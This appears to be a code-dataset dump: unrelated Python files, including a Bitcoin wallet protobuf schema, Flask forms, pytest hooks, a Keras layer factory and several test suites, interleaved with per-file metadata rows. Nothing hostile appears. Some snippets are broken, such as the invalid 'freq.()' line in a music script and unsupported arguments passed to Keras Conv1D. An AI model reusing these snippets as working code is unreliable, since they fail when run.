# called the lookahead zone. These keys are put into Bloom filters so we can
# spot transactions made by clones of this wallet - for instance when
# restoring from backup or if the seed was shared between devices. If this
# field is missing it means we're not issuing subkeys of this key to users.
issued_subkeys: int = betterproto.uint32_field(3)
lookahead_size: int = betterproto.uint32_field(4)
# * Flag indicating that this key is a root of a following chain. This chain
# is following the next non-following chain. Following/followed chains
# concept is used for married keychains, where the set of keys combined
# together to produce a single P2SH multisignature address
is_following: bool = betterproto.bool_field(5)
@dataclass
class Key(betterproto.Message):
"""
* A key used to control Bitcoin spending. Either the private key, the
public key or both may be present. It is recommended that if the private
key is provided that the public key is provided too because deriving it is
slow. If only the public key is provided, the key can only be used to watch
the blockchain and verify transactions, and not for spending.
"""
type: "KeyType" = betterproto.enum_field(1)
# Either the private EC key bytes (without any ASN.1 wrapping), or the
# deterministic root seed. If the secret is encrypted, or this is a "watching
# entry" then this is missing.
secret_bytes: bytes = betterproto.bytes_field(2)
# If the secret data is encrypted, then secret_bytes is missing and this
# field is set.
encrypted_data: "EncryptedData" = betterproto.message_field(3)
# The public EC key derived from the private key. We allow both to be stored
# to avoid mobile clients having to do lots of slow EC math on startup. For
# DETERMINISTIC_MNEMONIC entries this is missing.
public_key: bytes = betterproto.bytes_field(4)
# User-provided label associated with the key.
label: str = betterproto.string_field(5)
deterministic_key: "DeterministicKey" = betterproto.message_field(6)
@dataclass
class TransactionInput(betterproto.Message):
# Hash of the transaction this input is using.
transaction_out_point_hash: bytes = betterproto.bytes_field(1)
# Index of transaction output used by this input.
transaction_out_point_index: int = betterproto.uint32_field(2)
# Script that contains the signatures/pubkeys.
script_bytes: bytes = betterproto.bytes_field(3)
# Sequence number. Currently unused, but intended for contracts in future.
sequence: int = betterproto.uint32_field(4)
# Value of connected output, if known
value: int = betterproto.int64_field(5)
@dataclass
class TransactionOutput(betterproto.Message):
value: int = betterproto.int64_field(1)
script_bytes: bytes = betterproto.bytes_field(2)
# If spent, the hash of the transaction doing the spend.
spent_by_transaction_hash: bytes = betterproto.bytes_field(3)
# If spent, the index of the transaction input of the transaction doing the
# spend.
spent_by_transaction_index: int = betterproto.int32_field(4)
@dataclass
class TransactionConfidence(betterproto.Message):
"""
* A description of the confidence we have that a transaction cannot be
reversed in the future. Parsing should be lenient, since this could change
for different applications yet we should maintain backward compatibility.
"""
# This is optional in case we add confidence types to prevent parse errors -
# backwards compatible.
type: "TransactionConfidenceType" = betterproto.enum_field(1)
# If type == BUILDING then this is the chain height at which the transaction
# was included.
appeared_at_height: int = betterproto.int32_field(2)
# If set, hash of the transaction that double spent this one into oblivion. A
# transaction can be double spent by multiple transactions in the case of
# several inputs being re-spent by several transactions but we don't bother
# to track them all, just the first. This only makes sense if type = DEAD.
overriding_transaction: bytes = betterproto.bytes_field(3)
# If type == BUILDING then this is the depth of the transaction in the
# blockchain. Zero confirmations: depth = 0, one confirmation: depth = 1 etc.
depth: int = betterproto.int32_field(4)
broadcast_by: List["PeerAddress"] = betterproto.message_field(5)
source: "TransactionConfidenceSource" = betterproto.enum_field(6)
@dataclass
class Transaction(betterproto.Message):
# See Wallet.java for detailed description of pool semantics
version: int = betterproto.int32_field(1)
time: int = betterproto.int32_field(11)
hash: bytes = betterproto.bytes_field(2)
# If pool is not present, that means either: - This Transaction is either
# not in a wallet at all (the proto is re-used elsewhere) - Or it is stored
# but for other purposes, for example, because it is the overriding
# transaction of a double spend. - Or the Pool enum got a new value which
# your software is too old to parse.
pool: "TransactionPool" = betterproto.enum_field(3)
lock_time: int = betterproto.uint32_field(4)
updated_at: int = betterproto.int64_field(5)
transaction_input: List["TransactionInput"] = betterproto.message_field(6)
transaction_output: List["TransactionOutput"] = betterproto.message_field(7)
# A list of blocks in which the transaction has been observed (on any chain).
# Also, a number used to disambiguate ordering within a block.
block_hash: List[bytes] = betterproto.bytes_field(8)
block_relativity_offsets: List[int] = betterproto.int32_field(9)
# Data describing where the transaction is in the chain.
confidence: "TransactionConfidence" = betterproto.message_field(10)
token_id: int = betterproto.int32_field(12)
@dataclass
class AddressStatus(betterproto.Message):
address: str = betterproto.string_field(1)
status: str = betterproto.string_field(2)
@dataclass
class WalletPocket(betterproto.Message):
"""* A wallet pocket"""
network_identifier: str = betterproto.string_field(1)
# A UTF8 encoded text description of the wallet that is intended for end user
# provided text.
description: str = betterproto.string_field(2)
key: List["Key"] = betterproto.message_field(3)
# The SHA256 hash of the head of the best chain seen by this wallet.
last_seen_block_hash: bytes = betterproto.bytes_field(4)
# The height in the chain of the last seen block.
last_seen_block_height: int = betterproto.uint32_field(5)
last_seen_block_time_secs: int = betterproto.int64_field(6)
transaction: List["Transaction"] = betterproto.message_field(7)
address_status: List["AddressStatus"] = betterproto.message_field(8)
@dataclass
class ScryptParameters(betterproto.Message):
"""
* The parameters used in the scrypt key derivation function. The default
values are taken from http://www.tarsnap.com/scrypt/scrypt-slides.pdf.
They can be increased - n is the number of iterations performed and r and
p can be used to tweak the algorithm - see:
http://stackoverflow.com/questions/11126315/what-are-optimal-scrypt-work-
factors
"""
salt: bytes = betterproto.bytes_field(1)
n: int = betterproto.int64_field(2)
r: int = betterproto.int32_field(3)
p: int = betterproto.int32_field(4)
@dataclass
class Wallet(betterproto.Message):
"""* A bitcoin wallet"""
# The version number of the wallet - used to detect wallets that were
# produced in the future (i.e the wallet may contain some future format this
# protobuf/ code does not know about)
version: int = betterproto.int32_field(1)
seed: "Key" = betterproto.message_field(2)
master_key: "Key" = betterproto.message_field(3)
encryption_type: "WalletEncryptionType" = betterproto.enum_field(4)
encryption_parameters: "ScryptParameters" = betterproto.message_field(5)
pockets: List["WalletPocket"] = betterproto.message_field(6)
| 41.518367 | 81 | 0.735843 | 1,405 | 10,172 | 5.235587 | 0.28968 | 0.061175 | 0.042822 | 0.053018 | 0.171561 | 0.066069 | 0.039967 | 0.012779 | 0.012779 | 0 | 0 | 0.018652 | 0.193571 | 10,172 | 244 | 82 | 41.688525 | 0.878093 | 0.467263 | 0 | 0.140351 | 1 | 0 | 0.047537 | 0.013937 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.026316 | 0 | 0.894737 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
1e9c1c4d3812edf63f576c146c1a068b5cb823cb | 1,334 | py | Python | bluesky/tests/test_olog_cb.py | AbbyGi/bluesky | 759f9c55dce97dc47513cca749a69dd861bdf58d | [
"BSD-3-Clause"
] | 43 | 2015-08-04T20:13:41.000Z | 2019-04-12T17:21:36.000Z | bluesky/tests/test_olog_cb.py | AbbyGi/bluesky | 759f9c55dce97dc47513cca749a69dd861bdf58d | [
"BSD-3-Clause"
] | 966 | 2015-07-29T16:43:21.000Z | 2019-05-09T21:02:28.000Z | bluesky/tests/test_olog_cb.py | AbbyGi/bluesky | 759f9c55dce97dc47513cca749a69dd861bdf58d | [
"BSD-3-Clause"
] | 48 | 2019-05-15T18:01:06.000Z | 2022-03-03T18:53:43.000Z | from bluesky import Msg
from bluesky.callbacks.olog import logbook_cb_factory
text = []
def f(**kwargs):
text.append(kwargs['text'])
def test_default_template(RE):
text.clear()
RE.subscribe(logbook_cb_factory(f), 'start')
RE([Msg('open_run', plan_args={}), Msg('close_run')])
assert len(text[0]) > 0
def test_trivial_template(RE):
text.clear()
RE.subscribe(logbook_cb_factory(f, desc_template='hello'), 'start')
RE([Msg('open_run', plan_args={}), Msg('close_run')])
assert text[0] == 'hello'
# smoke test the long_template
RE.subscribe(logbook_cb_factory(f, long_template='hello'), 'start')
RE([Msg('open_run', plan_args={}), Msg('close_run')])
def test_template_dispatch(RE):
disp = {'a': 'A', 'b': 'B'}
text.clear()
RE.subscribe(logbook_cb_factory(f, desc_dispatch=disp), 'start')
RE([Msg('open_run', plan_name='a', plan_args={}),
Msg('close_run')])
RE([Msg('open_run', plan_name='b', plan_args={}),
Msg('close_run')])
assert text[0] == 'A'
assert text[1] == 'B'
# smoke test the long_dispatch
RE.subscribe(logbook_cb_factory(f, long_dispatch=disp), 'start')
RE([Msg('open_run', plan_name='a', plan_args={}),
Msg('close_run')])
RE([Msg('open_run', plan_name='b', plan_args={}),
Msg('close_run')])
| 29 | 71 | 0.632684 | 195 | 1,334 | 4.076923 | 0.210256 | 0.044025 | 0.079245 | 0.10566 | 0.703145 | 0.703145 | 0.703145 | 0.622642 | 0.602516 | 0.545912 | 0 | 0.004525 | 0.171664 | 1,334 | 45 | 72 | 29.644444 | 0.714932 | 0.042729 | 0 | 0.4375 | 0 | 0 | 0.135793 | 0 | 0 | 0 | 0 | 0 | 0.125 | 1 | 0.125 | false | 0 | 0.0625 | 0 | 0.1875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
1e9d4fe08c78dd0c209780bf5c525f478d7523d8 | 416 | py | Python | venv/lib/python3.6/site-packages/pykalman/sqrt/tests/test_bierman.py | QuantTraderEd/vnpy_crypto | a1142eddaa8a7eb63cc13af30554c05718e151b1 | [
"MIT"
] | 34 | 2018-07-13T11:30:46.000Z | 2022-01-05T13:48:10.000Z | venv/lib/python3.6/site-packages/pykalman/sqrt/tests/test_bierman.py | HeyWeiPan/vnpy_crypto | 844381797a475a01c05a4e162592a5a6e3a48032 | [
"MIT"
] | null | null | null | venv/lib/python3.6/site-packages/pykalman/sqrt/tests/test_bierman.py | HeyWeiPan/vnpy_crypto | 844381797a475a01c05a4e162592a5a6e3a48032 | [
"MIT"
] | 22 | 2018-07-13T11:30:48.000Z | 2021-09-25T13:30:08.000Z | from unittest import TestCase
from pykalman.sqrt import BiermanKalmanFilter
from pykalman.tests.test_standard import KalmanFilterTests
from pykalman.datasets import load_robot
class BiermanKalmanFilterTestSuite(TestCase, KalmanFilterTests):
"""Run Kalman Filter tests on the UDU' Decomposition-based Kalman Filter"""
def setUp(self):
self.KF = BiermanKalmanFilter
self.data = load_robot()
| 32 | 79 | 0.786058 | 47 | 416 | 6.893617 | 0.617021 | 0.111111 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.153846 | 416 | 12 | 80 | 34.666667 | 0.920455 | 0.165865 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.5 | 0 | 0.75 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
1eaae9c3607b8223e9bc956287d1a238d0263d6e | 1,131 | py | Python | screenpy/questions/text_of_the_alert.py | Z-Brueske/screenpy | 1c852a49eb3821727662458fd707b9bcf48bb8cf | [
"MIT"
] | null | null | null | screenpy/questions/text_of_the_alert.py | Z-Brueske/screenpy | 1c852a49eb3821727662458fd707b9bcf48bb8cf | [
"MIT"
] | null | null | null | screenpy/questions/text_of_the_alert.py | Z-Brueske/screenpy | 1c852a49eb3821727662458fd707b9bcf48bb8cf | [
"MIT"
] | null | null | null | """
A question to discover the text of an alert. Questions must be asked with
an expected resolution, like so:
the_actor.should_see_the(
(TextOfTheAlert(), ReadsExactly("Look out!!")),
)
"""
from ..abilities import BrowseTheWeb
from ..actor import Actor
from ..pacing import beat
from .base_question import BaseQuestion
class TextOfTheAlert(BaseQuestion):
"""
Asks what text appears in the alert, viewed by an |Actor|. This
question is expected to be instantiated as it is, no static methods
for this one. The only invocation looks like:
TextOfTheAlert()
It can then be passed along to the |Actor| to ask the question.
"""
@beat("{} reads the text from the alert.")
def answered_by(self, the_actor: Actor) -> str:
"""
Asks the supplied actor to investigate the alert and give their
answer.
Args:
the_actor: the |Actor| who will answer the question.
Returns:
str: the text of the alert.
"""
alert = the_actor.uses_ability_to(BrowseTheWeb).to_switch_to_alert()
return alert.text
| 26.928571 | 76 | 0.660477 | 152 | 1,131 | 4.828947 | 0.506579 | 0.065395 | 0.024523 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.259947 | 1,131 | 41 | 77 | 27.585366 | 0.876941 | 0.567639 | 0 | 0 | 0 | 0 | 0.085271 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.444444 | 0 | 0.777778 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
1ec48483cf6a812b6fdeaee84a44fdb371df5a34 | 1,522 | py | Python | test.py | MushinMiscellanea/Musically | f1bd8df3e43317213b149bda255445d6ac3a2c09 | [
"MIT"
] | null | null | null | test.py | MushinMiscellanea/Musically | f1bd8df3e43317213b149bda255445d6ac3a2c09 | [
"MIT"
] | null | null | null | test.py | MushinMiscellanea/Musically | f1bd8df3e43317213b149bda255445d6ac3a2c09 | [
"MIT"
] | null | null | null | import csv
import pandas as pd
import matplotlib as mt
pitch = pd.read_csv('/Users/spencerfinkel/repos/musically/pitch_freq.csv')
pitch = pitch.rename(columns={'Unnamed: 2': 'Octive'})
p = (list(pitch))
freq = pitch['Frequency (Hz)']
freq.()
'''#frequency of all notes in a scale
for i in range(13):
freq = 16.35
freq1 = freq*((2**(1/12))**i)
print(f'{freq1:.2f}')
#list comprehension, whole octive frequencies
freq = 73.42
freqsincomprehension = [float(freq*((2**(1/12))**i)) for i in range(13)]
for item in freqsincomprehension:
print('{:.2f}'.format(item))
print()
#frequencies of minor scale
def minor_freq(*args):
for i in range(13):
freq1=freq
freq1=freq*((2**(1/12))**i)
if i == 1 or i ==4 or i == 6 or i == 9 or i ==11:
continue
else:
print(f'{freq1:.2f}')
minor_freq(freq)
print()
#all the octaves of the frequency
def octive(arg):
print()
series = [arg]
if arg > 16.35:
arg1 = arg
for oct in range(8):
arg1/=2
series.insert(0, arg1)
for oct in range(8):
arg *= 2
series.append(arg)
else:
for oct in range(8):
arg *= 2
series.append(arg)
series1 = [item for item in series if item <= 7902.13 and item >= 1.00]
#[enumerate(item) for item in series if item >= 16.35]
print(series1)
def main():
freq = float(input('What frequency are you looking for: '))
octive(freq)
main()'''
| 21.43662 | 75 | 0.574244 | 226 | 1,522 | 3.849558 | 0.362832 | 0.048276 | 0.02069 | 0.037931 | 0.236782 | 0.165517 | 0.133333 | 0.075862 | 0.075862 | 0.075862 | 0 | 0.063463 | 0.275296 | 1,522 | 70 | 76 | 21.742857 | 0.725295 | 0 | 0 | 0 | 0 | 0 | 0.325301 | 0.204819 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.375 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
1ec6276dbd014d4e7c628f11208c2aa3d1f62cfc | 2,410 | py | Python | source/cyoa/forms.py | eeyun/cyoa | ad619c60b1c960c2bfadda87f92637796d93ca8f | [
"Apache-2.0"
] | 3 | 2017-02-28T19:41:07.000Z | 2021-08-18T22:49:19.000Z | source/cyoa/forms.py | eeyun/cyoa | ad619c60b1c960c2bfadda87f92637796d93ca8f | [
"Apache-2.0"
] | null | null | null | source/cyoa/forms.py | eeyun/cyoa | ad619c60b1c960c2bfadda87f92637796d93ca8f | [
"Apache-2.0"
] | null | null | null | from flask.ext.wtf import Form
from wtforms import StringField, PasswordField, BooleanField, SubmitField, \
DateField, IntegerField
from wtforms.validators import Required, Length, Regexp, EqualTo
from wtforms import ValidationError
from .models import Wizard
class LoginForm(Form):
wizard_name = StringField('Username',
validators=[Required(), Length(1, 32)])
password = PasswordField('Password', validators=[Required(),
Length(1, 32)])
def validate(self):
if not Form.validate(self):
return False
user = Wizard.query.filter_by(wizard_name=self.
wizard_name.data).first()
if user is not None and not user.verify_password(self.password.data):
self.password.errors.append('Incorrect password.')
return False
return True
class PresentationForm(Form):
name = StringField('Presentation name', validators=[Required(),
Length(1, 60)])
filename = StringField('File name', validators=[Required(),
Length(1, 255)])
slug = StringField('URL slug', validators=[Required(),
Length(1, 255)])
is_visible = BooleanField()
class DecisionForm(Form):
slug = StringField('URL slug', validators=[Required(),
Length(1, 128)])
first_path_slug = StringField('A word for the first path. Must be '
'lowercase. No spaces.',
validators=[Required(), Length(1, 64),
Regexp('[a-z0-9]+', message=
'Choice must be lowercase '
'with no whitespace.')])
second_path_slug = StringField('A word for the second path. Must be '
'lowercase. No spaces.',
validators=[Required(), Length(1, 64),
Regexp('[a-z-0-9]+', message=
'Choice must be lowercase '
'with no whitespace.')])
| 47.254902 | 77 | 0.479668 | 206 | 2,410 | 5.563107 | 0.38835 | 0.109948 | 0.167539 | 0.17452 | 0.422339 | 0.319372 | 0.319372 | 0.267016 | 0.184991 | 0.106457 | 0 | 0.022496 | 0.428216 | 2,410 | 50 | 78 | 48.2 | 0.809144 | 0 | 0 | 0.325581 | 0 | 0 | 0.123237 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.023256 | false | 0.093023 | 0.116279 | 0 | 0.488372 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
1edd90a13cef945adf99324275344c4e5387f197 | 1,473 | py | Python | pytest_never_sleep/hooks.py | DKorytkin/pytest-never-sleep | e655fbff4d51b8a7e41a56e584dae55013f7160f | [
"MIT"
] | null | null | null | pytest_never_sleep/hooks.py | DKorytkin/pytest-never-sleep | e655fbff4d51b8a7e41a56e584dae55013f7160f | [
"MIT"
] | 2 | 2021-05-19T07:55:13.000Z | 2021-05-21T09:49:05.000Z | pytest_never_sleep/hooks.py | DKorytkin/pytest-never-sleep | e655fbff4d51b8a7e41a56e584dae55013f7160f | [
"MIT"
] | null | null | null | import pytest
# These are specifications, so no implementation:
# pylint: disable=unused-argument
@pytest.hookspec(firstresult=True)
def pytest_never_sleep_whitelist():
"""
This hook adds ability to adding own paths where `time.sleep` allowed
and plugin will skip raising errors
Returns
-------
Tuple[str]
Usage in conftest:
>>> def pytest_never_sleep_whitelist():
>>> return "root_dir.folder.module", "root_dir.folder_two."
"""
@pytest.hookspec(firstresult=True)
def pytest_never_sleep_message_format(config, frame):
"""
In this hook you can overwrite default message format on your own
Allowed methods:
f_back - next outer frame object
f_builtins - builtins namespace seen by this frame
f_code - code object being executed in this frame
f_globals - global namespace seen by this frame
f_lasti - index of last attempted instruction in bytecode
f_lineno - current line number in Python source code
f_locals - local namespace seen by this frame
f_trace - tracing function for this frame, or None
https://docs.python.org/3/library/inspect.html
Parameters
----------
config: _pytest.config.Config
frame: frame
Returns
-------
str
Usage in conftest:
>>> def pytest_never_sleep_message_format(config, frame):
>>> return "{}:{}".format(frame.f_code.co_filename, frame.f_code.co_firstlineno)
"""
| 27.792453 | 88 | 0.680244 | 191 | 1,473 | 5.089005 | 0.549738 | 0.037037 | 0.057613 | 0.078189 | 0.319959 | 0.30144 | 0.22428 | 0.22428 | 0 | 0 | 0 | 0.000881 | 0.229464 | 1,473 | 52 | 89 | 28.326923 | 0.855507 | 0.775289 | 0 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0 | 0.2 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
948ea6a0b5c056f9fe9ef6242bd4fbe718ac42ab | 6,142 | py | Python | veqtor_keras/blocks/layer_factory.py | veqtor/veqtor_keras | 303f81b7c6aaa7962b288541275fe7ea618804b9 | [
"MIT"
] | 1 | 2020-08-07T14:47:16.000Z | 2020-08-07T14:47:16.000Z | veqtor_keras/blocks/layer_factory.py | veqtor/veqtor_keras | 303f81b7c6aaa7962b288541275fe7ea618804b9 | [
"MIT"
] | null | null | null | veqtor_keras/blocks/layer_factory.py | veqtor/veqtor_keras | 303f81b7c6aaa7962b288541275fe7ea618804b9 | [
"MIT"
] | null | null | null | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.keras import layers as tfkl
from veqtor_keras import layers as vqkl
def get_1d_layer(type,
output_dim,
output_mul,
context_size,
stride=1,
dilation=1,
grouped=False,
group_size=1,
padding='same',
activation=None,
use_bias=True,
kernel_initializer='glorot_uniform',
bias_initializer='zeros',
kernel_regularizer=None,
bias_regularizer=None,
activity_regularizer=None,
kernel_constraint=None,
bias_constraint=None,
**kwargs):
if type.lower() == 'TimeDelayLayer1D'.lower():
if padding == 'causal':
padding = 'same'
return vqkl.time_delay_layers.TimeDelayLayer1D(output_dim=output_dim,
context_size=context_size,
stride=stride,
dilation=dilation,
padding=padding,
activation=activation,
use_bias=use_bias,
kernel_initializer=kernel_initializer,
bias_initializer=bias_initializer,
kernel_regularizer=kernel_regularizer,
bias_regularizer=bias_regularizer,
activity_regularizer=activity_regularizer,
kernel_constraint=kernel_constraint,
bias_constraint=bias_constraint, **kwargs)
elif type.lower() == 'DepthGroupwiseTimeDelayLayer1D'.lower():
if padding == 'causal':
padding = 'same'
return vqkl.time_delay_layers.DepthGroupwiseTimeDelayLayer1D(output_mul=output_mul,
context_size=context_size,
stride=stride,
dilation=dilation,
padding=padding,
activation=activation,
use_bias=use_bias,
grouped=grouped,
group_size=group_size,
kernel_initializer=kernel_initializer,
bias_initializer=bias_initializer,
kernel_regularizer=kernel_regularizer,
bias_regularizer=bias_regularizer,
activity_regularizer=activity_regularizer,
kernel_constraint=kernel_constraint,
bias_constraint=bias_constraint, **kwargs)
elif type.lower() in ['Convolution1D'.lower(), 'Conv1D'.lower()]:
return tfkl.Convolution1D(filters=output_dim,
kernel_size=context_size,
strides=stride,
dilation_rate=dilation,
padding=padding,
activation=activation,
use_bias=use_bias,
grouped=grouped,
group_size=group_size,
kernel_initializer=kernel_initializer,
bias_initializer=bias_initializer,
kernel_regularizer=kernel_regularizer,
bias_regularizer=bias_regularizer,
activity_regularizer=activity_regularizer,
kernel_constraint=kernel_constraint,
bias_constraint=bias_constraint, **kwargs)
elif type.lower() in ['SeparableConv1D'.lower(), 'SeparableConvolution1D'.lower()]:
return tfkl.SeparableConvolution1D(filters=output_dim,
kernel_size=context_size,
strides=stride,
dilation_rate=dilation,
padding=padding,
activation=activation,
use_bias=use_bias,
grouped=grouped,
group_size=group_size,
kernel_initializer=kernel_initializer,
bias_initializer=bias_initializer,
kernel_regularizer=kernel_regularizer,
bias_regularizer=bias_regularizer,
activity_regularizer=activity_regularizer,
kernel_constraint=kernel_constraint,
bias_constraint=bias_constraint, **kwargs)
| 62.040404 | 111 | 0.395799 | 346 | 6,142 | 6.679191 | 0.182081 | 0.027261 | 0.090004 | 0.055387 | 0.697101 | 0.697101 | 0.697101 | 0.697101 | 0.697101 | 0.697101 | 0 | 0.005199 | 0.561543 | 6,142 | 98 | 112 | 62.673469 | 0.852952 | 0 | 0 | 0.659574 | 0 | 0 | 0.023608 | 0.008466 | 0 | 0 | 0 | 0 | 0 | 1 | 0.010638 | false | 0 | 0.053191 | 0 | 0.106383 | 0.010638 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
94c52d6aae8dd2386cac52f2ba9082ee21f859b2 | 8,528 | py | Python | tests/test_ft_redis.py | zul126/minemeld-core | 2eb9b9bfd7654aee57aabd5fb280d4e89a438daf | [
"Apache-2.0"
] | 1 | 2021-01-02T07:25:04.000Z | 2021-01-02T07:25:04.000Z | tests/test_ft_redis.py | zul126/minemeld-core | 2eb9b9bfd7654aee57aabd5fb280d4e89a438daf | [
"Apache-2.0"
] | null | null | null | tests/test_ft_redis.py | zul126/minemeld-core | 2eb9b9bfd7654aee57aabd5fb280d4e89a438daf | [
"Apache-2.0"
] | 1 | 2019-03-14T06:52:52.000Z | 2019-03-14T06:52:52.000Z | # Copyright 2015 Palo Alto Networks, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""FT Redis tests
Unit tests for minemeld.ft.redis
"""
import gevent.monkey
gevent.monkey.patch_all(thread=False, select=False)
import unittest
import mock
import redis
import time
import minemeld.ft.redis
FTNAME = 'testft-%d' % int(time.time())
class MineMeldFTRedisTests(unittest.TestCase):
def setUp(self):
SR = redis.StrictRedis()
SR.delete(FTNAME)
def tearDown(self):
SR = redis.StrictRedis()
SR.delete(FTNAME)
def test_init(self):
config = {}
chassis = mock.Mock()
b = minemeld.ft.redis.RedisSet(FTNAME, chassis, config)
self.assertEqual(b.name, FTNAME)
self.assertEqual(b.chassis, chassis)
self.assertEqual(b.config, config)
self.assertItemsEqual(b.inputs, [])
self.assertEqual(b.output, None)
self.assertEqual(b.redis_skey, FTNAME)
self.assertNotEqual(b.SR, None)
self.assertEqual(b.redis_host, '127.0.0.1')
self.assertEqual(b.redis_port, 6379)
self.assertEqual(b.redis_password, None)
self.assertEqual(b.redis_db, 0)
def test_connect_io(self):
config = {}
chassis = mock.Mock()
chassis.request_sub_channel.return_value = None
ochannel = mock.Mock()
chassis.request_pub_channel.return_value = ochannel
chassis.request_rpc_channel.return_value = None
b = minemeld.ft.redis.RedisSet(FTNAME, chassis, config)
inputs = ['a', 'b', 'c']
output = True
b.connect(inputs, output)
b.mgmtbus_initialize()
self.assertItemsEqual(b.inputs, inputs)
self.assertEqual(b.output, None)
icalls = []
for i in inputs:
icalls.append(
mock.call(
FTNAME, b, i,
allowed_methods=[
'update', 'withdraw', 'checkpoint'
]
)
)
chassis.request_sub_channel.assert_has_calls(
icalls,
any_order=True
)
chassis.request_rpc_channel.assert_called_once_with(
FTNAME,
b,
allowed_methods=[
'update',
'withdraw',
'checkpoint',
'get',
'get_all',
'get_range',
'length'
]
)
chassis.request_pub_channel.assert_not_called()
def test_uw(self):
config = {}
chassis = mock.Mock()
chassis.request_sub_channel.return_value = None
ochannel = mock.Mock()
chassis.request_pub_channel.return_value = ochannel
chassis.request_rpc_channel.return_value = None
rpcmock = mock.Mock()
rpcmock.get.return_value = {'error': None, 'result': 'OK'}
chassis.send_rpc.return_value = rpcmock
b = minemeld.ft.redis.RedisSet(FTNAME, chassis, config)
inputs = ['a', 'b', 'c']
output = False
b.connect(inputs, output)
b.mgmtbus_initialize()
b.start()
time.sleep(1)
SR = redis.StrictRedis()
b.filtered_update('a', indicator='testi', value={'test': 'v'})
sm = SR.zrange(FTNAME, 0, -1)
self.assertEqual(len(sm), 1)
self.assertIn('testi', sm)
b.filtered_withdraw('a', indicator='testi')
sm = SR.zrange(FTNAME, 0, -1)
self.assertEqual(len(sm), 0)
b.stop()
self.assertNotEqual(b.SR, None)
def test_stats(self):
config = {}
chassis = mock.Mock()
chassis.request_sub_channel.return_value = None
ochannel = mock.Mock()
chassis.request_pub_channel.return_value = ochannel
chassis.request_rpc_channel.return_value = None
rpcmock = mock.Mock()
rpcmock.get.return_value = {'error': None, 'result': 'OK'}
chassis.send_rpc.return_value = rpcmock
b = minemeld.ft.redis.RedisSet(FTNAME, chassis, config)
inputs = ['a', 'b', 'c']
output = False
b.connect(inputs, output)
b.mgmtbus_reset()
b.start()
time.sleep(1)
b.filtered_update('a', indicator='testi', value={'test': 'v'})
self.assertEqual(b.length(), 1)
status = b.mgmtbus_status()
self.assertEqual(status['statistics']['added'], 1)
b.filtered_update('a', indicator='testi', value={'test': 'v2'})
self.assertEqual(b.length(), 1)
status = b.mgmtbus_status()
self.assertEqual(status['statistics']['added'], 1)
self.assertEqual(status['statistics']['removed'], 0)
b.filtered_withdraw('a', indicator='testi')
self.assertEqual(b.length(), 0)
status = b.mgmtbus_status()
self.assertEqual(status['statistics']['removed'], 1)
b.stop()
def test_store_value(self):
config = {'store_value': True}
chassis = mock.Mock()
chassis.request_sub_channel.return_value = None
ochannel = mock.Mock()
chassis.request_pub_channel.return_value = ochannel
chassis.request_rpc_channel.return_value = None
